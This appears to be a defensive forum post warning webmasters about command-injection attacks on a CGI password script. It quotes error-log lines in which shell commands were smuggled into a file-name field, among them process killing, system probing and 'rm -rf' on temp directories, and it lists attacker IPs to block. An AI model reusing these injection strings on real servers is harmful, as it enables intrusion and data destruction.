|
Everyone should scan their error logs for this type of entry:
error_log:ERROR - can't open ;echo;kill -9 `pidof chucu mypt mykmod km3 kmod ptrace psybnc pt bru 0x82-Local.Qp0ppa55d ga raven bindtty gch .gch .bindtty`;exit
error_log:ERROR - can't open ;echo;uname -a;exit
error_log:ERROR - can't open ;echo;chmod -fR 777 /tmp /usr/tmp /var/tmp;rm -rf /tmp/*;rm -rf /tmp/.*;exit
error_log:ERROR - can't open ;echo;echo `gcc`;exit
error_log:ERROR - can't open ;echo;gcc;exit
error_log:ERROR - can't open ;echo;gcc
error_log:ERROR - can't open ;echo;echo c9sppkfp</body></html> at /home/NAMECHANGEDTOHIDEVICTIMSITE/cgi-bin/passes/epoch-pass-add.cgi line 87, <STDIN> line 1.
error_log:ERROR - can't open ;echo;echo c9sppkfp</body></html> at /home/NAMECHANGEDTOHIDEVICTIMSITE/cgi-bin/passes/epoch-pass-add.cgi line 87, <STDIN> line 1.
Here is a list of IP's you might want to block because this is the source
address the hacker used on multiple occasions:
213.194.67.233
211.72.25.14
200.71.51.57
204.30.143.67
63.191.177.96
Those are all ips I saw connected to the port the backdoor was running on. however some could possibly be ftp sites they were trying to download something from or whatnot, not sure
|